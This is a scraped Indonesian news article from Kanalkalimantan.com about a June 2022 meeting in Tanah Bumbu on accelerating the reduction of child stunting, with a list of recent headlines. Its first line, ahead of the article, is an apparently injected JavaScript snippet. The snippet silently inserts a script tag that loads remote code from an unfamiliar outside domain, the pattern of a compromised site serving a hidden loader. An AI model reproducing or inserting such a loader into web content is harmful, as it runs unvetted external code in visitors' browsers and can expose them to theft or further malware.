(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Tanah Bumbu

Upaya DP3AP2KB Tanbu Terus Menekan Stunting


KANALKALIMANTAN.COM, BATULICIN – Dinas Pemberdayaan Perempuan, Perlindungan Anak, Pengendalian Penduduk dan Keluarga Berencana (P3AP2KB) menggelar pertemuan percepatan penurunan stunting, Kamis (16/6/2022 ).

Kepala Dinas P3AP2KB Tanbu, Hj Narni mengatakan, persiapan penilaian evaluasi Tim Koordinasi Konvergensi Percepatan Penurunan Stunting (KP2S) dan rencananya akan dilaksanakan pada Senin 20 Juni 2022.

Pelaksanaan evaluasi aksi satu dampai empat harus sudah diinput ke sistem Kementerian Dalam Negeri, tetapi belum semua SKPD di Tanbu bisa menyelesaikanya.

“Kami juga menyosialisasikan dan mengenalkan bahwa selain tim TP2S, ada juga tim audit stunting. Nanti tim audit stunting akan membahas secara berkala empat kali setahun,” ujarnya.

 

Baca juga  : Dinkes Tanbu Gelar Pertemuan KPM Upaya Tekan Stunting

Status kasus stunting yang ada di Puskesmas merupakan hasil temuan tim pendamping keluarga akan diangkat ke tingkat kabupaten untuk dibahas.

Narni mengungkapkan, penyebab langsung dari pada kasus stunting yang terjadi pada anak-anak bervariasi di suatu daerah, dengan karakteristik masalah yang berbeda pula.

“Kasus stunting di Tanah Bumbu harus bisa turun sampai 14%, sesuai dengan target yang telah ditetapkan oleh pemerintah untuk tahun 2024.

Sementara itu, Ketua TP PKK Tanah Bumbu Hj Wahyu Windarti Zairullah sangat berterimakasih atas usaha keras yang dilakukan TP2S terkait penurunan stunting.

Dirinya menginginkan, supaya Tabu bisa menjadi urutan paling tidak kedua, kalau bisa di posisi pertama angka stunting di Kalsel. Menurut informasi, kasus stunting di Bumi Bersujud termasuk kategori rendah, dengan percepatan penurunanya di urutan ketiga di Provinsi Kalimantan Selatan. (Kanalkalimantan.com/ftr)

Reporter : ftr
Editor : kk


Desy Arfianty

Recent Posts

SKPD Mengajar di SMPN 2 Banjarbaru, Wali Kota Aditya Ngajar Kelas Inspirasi

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin memulai program SKPD Instansi Mengajar dengan… Read More

28 menit ago

Pastikan Kehadiran Habib Syech ke Kapuas Bersholawat 27 Juni

KANALKALIMANTAN.COM, SOLO - Penjabat (Pj) Bupati Kapuas Erlin Hardi bersilaturahmi ke kediaman Habib Syech bin… Read More

41 menit ago

Ragam Kerajinan Rotan Merah Mejeng di Expo HUT ke-44 Dekranas

KANALKALIMANTAN.COM, SOLO - Kerajinan dari rotan merah menjadi salah satu primadona yang dihadirkan Dewan Kerajinan… Read More

53 menit ago

Pj Bupati Erlin Hardi Berdialog dengan Mahasiswa Kapuas di Yogya

KANALKALIMANTAN.COM, YOGYAKARTA - Penjabat (Pj) Bupati Kapuas Erlin Hardi berdialog dengan mahasiswa asal Kabupaten Kapuas… Read More

2 jam ago

Modus Pinjam Bendera Perusahaan Korupsi Proyek RS Kelua Tabalong

Empat Terdakwa Jalani Sidang, Satu Orang Mantan Kepala Dinas Kesehatan Read More

3 jam ago

Camat Lurah Boleh Jabat Sekretariat PPK PPS

KANALKALIMANTAN.COM, BANJARBARU - Camat dan Lurah diperbolehkan menjabat sebagai Sekretariat Panitia Pemungutan Kecamatan (PPK) maupun… Read More

16 jam ago

This website uses cookies.